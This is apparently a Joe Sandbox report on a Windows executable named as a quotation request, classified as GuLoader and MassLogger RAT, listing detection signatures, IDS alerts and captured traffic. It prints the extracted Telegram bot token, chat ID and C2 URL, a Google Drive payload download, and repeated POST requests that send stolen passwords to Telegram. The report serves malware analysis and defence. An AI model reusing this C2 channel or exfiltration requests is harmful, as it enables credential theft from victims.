Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REQUEST FOR QUOATION AND PRICES.exe

Overview

General Information

Sample name:REQUEST FOR QUOATION AND PRICES.exe
Analysis ID:1567431
MD5:143edb6c5c1e1a1e06695965f2b5cb74
SHA1:b43660357dbe4c3d84d4239b6273817b5eb1ff53
SHA256:05814550e1562d4c54710804145c678b6191aab6a07c73e6f7902b1149bb020d
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000005.00000002.1644205426.00000000050C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: REQUEST FOR QUOATION AND PRICES.exe PID: 7616JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T15:23:01.791954+010020577441Malware Command and Control Activity Detected192.168.2.749830149.154.167.220443TCP
            2024-12-03T15:23:06.396891+010020577441Malware Command and Control Activity Detected192.168.2.749844149.154.167.220443TCP
            2024-12-03T15:23:10.145994+010020577441Malware Command and Control Activity Detected192.168.2.749852149.154.167.220443TCP
            2024-12-03T15:23:13.917148+010020577441Malware Command and Control Activity Detected192.168.2.749863149.154.167.220443TCP
            2024-12-03T15:23:17.893806+010020577441Malware Command and Control Activity Detected192.168.2.749875149.154.167.220443TCP
            2024-12-03T15:23:21.905465+010020577441Malware Command and Control Activity Detected192.168.2.749883149.154.167.220443TCP
            2024-12-03T15:23:25.604826+010020577441Malware Command and Control Activity Detected192.168.2.749894149.154.167.220443TCP
            2024-12-03T15:23:29.303112+010020577441Malware Command and Control Activity Detected192.168.2.749903149.154.167.220443TCP
            2024-12-03T15:23:32.999234+010020577441Malware Command and Control Activity Detected192.168.2.749913149.154.167.220443TCP
            2024-12-03T15:23:37.577523+010020577441Malware Command and Control Activity Detected192.168.2.749925149.154.167.220443TCP
            2024-12-03T15:23:41.186381+010020577441Malware Command and Control Activity Detected192.168.2.749935149.154.167.220443TCP
            2024-12-03T15:23:44.858088+010020577441Malware Command and Control Activity Detected192.168.2.749943149.154.167.220443TCP
            2024-12-03T15:23:48.483823+010020577441Malware Command and Control Activity Detected192.168.2.749951149.154.167.220443TCP
            2024-12-03T15:23:52.010679+010020577441Malware Command and Control Activity Detected192.168.2.749962149.154.167.220443TCP
            2024-12-03T15:23:55.703363+010020577441Malware Command and Control Activity Detected192.168.2.749968149.154.167.220443TCP
            2024-12-03T15:23:59.435944+010020577441Malware Command and Control Activity Detected192.168.2.749978149.154.167.220443TCP
            2024-12-03T15:24:05.296567+010020577441Malware Command and Control Activity Detected192.168.2.749980149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T15:22:51.057369+010028032742Potentially Bad Traffic192.168.2.749802132.226.247.7380TCP
            2024-12-03T15:22:59.588677+010028032742Potentially Bad Traffic192.168.2.749802132.226.247.7380TCP
            2024-12-03T15:23:04.323085+010028032742Potentially Bad Traffic192.168.2.749838132.226.247.7380TCP
            2024-12-03T15:23:08.010701+010028032742Potentially Bad Traffic192.168.2.749850132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T15:22:42.735160+010028032702Potentially Bad Traffic192.168.2.749780172.217.19.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: REQUEST FOR QUOATION AND PRICES.exeAvira: detected
            Source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU", "Telegram Chatid": "7382809095"}
            Source: REQUEST FOR QUOATION AND PRICES.exe.7616.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendMessage"}
            Source: REQUEST FOR QUOATION AND PRICES.exeReversingLabs: Detection: 13%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDB4C0 CryptUnprotectData,10_2_36DDB4C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDBCBF CryptUnprotectData,10_2_36DDBCBF
            Source: REQUEST FOR QUOATION AND PRICES.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49809 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49780 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.7:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49830 version: TLS 1.2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405772
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_0040622D FindFirstFileW,FindClose,5_2_0040622D
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00402770 FindFirstFileW,10_2_00402770
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_00405772
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0040622D FindFirstFileW,FindClose,10_2_0040622D
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 0011E959h10_2_0011E6A8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 0011F082h10_2_0011EC67
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 0011F082h10_2_0011EFAF
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDAC65h10_2_36DDA928
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDD180h10_2_36DDCED8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDA779h10_2_36DDA4D0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDE998h10_2_36DDE6F0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDCD28h10_2_36DDCA80
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDFAF8h10_2_36DDF850
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDA321h10_2_36DDA078
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDC8D0h10_2_36DDC628
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DD9EC9h10_2_36DD9C20
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDC478h10_2_36DDC1D0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DD9A71h10_2_36DD97C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDF6A0h10_2_36DDF3F8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDF248h10_2_36DDEFA0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDEDF0h10_2_36DDEB48
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDC020h10_2_36DDBD78
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DD9619h10_2_36DD9370
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DDD5D8h10_2_36DDD330
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF630Dh10_2_36DF6130
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF6C97h10_2_36DF6130
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then push 00000000h10_2_36DF98D0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36DFA6C7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF49A0h10_2_36DF46F8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_36DF563F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF0740h10_2_36DF0498
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF18A0h10_2_36DF15F8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF3840h10_2_36DF3598
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF4548h10_2_36DF42A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF25AAh10_2_36DF2300
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF02E8h10_2_36DF0040
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF1448h10_2_36DF11A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF33E8h10_2_36DF3140
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF2150h10_2_36DF1EA8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF40F0h10_2_36DF3E48
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF5250h10_2_36DF4FA8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF2F90h10_2_36DF2CE8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF0FF0h10_2_36DF0D48
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF1CF8h10_2_36DF1A50
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF4DF8h10_2_36DF4B50
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF0B98h10_2_36DF08F0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF2B38h10_2_36DF2890
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then jmp 36DF3C98h10_2_36DF39F0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 4x nop then push 00000000h10_2_37E5E600

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49863 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49830 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49852 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49844 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49883 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49903 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49894 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49951 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49962 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49925 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49935 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49968 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49913 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49875 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49943 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd13868a3c5d2eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd13bb6da2d893Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd13e4e12a7243Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1412303aa220Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd143ddb19b669Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd147412cdacdfHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd14a1d614b40eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd14cdf870ea02Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd14f729073a19Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1529483e469fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd15571ad6327bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1584a2f82aa8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd15b70a124c6dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd15f5efddc12bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd16309522eae9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd168945128f1dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd16f8012457e7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49802 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49838 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49850 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49780 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
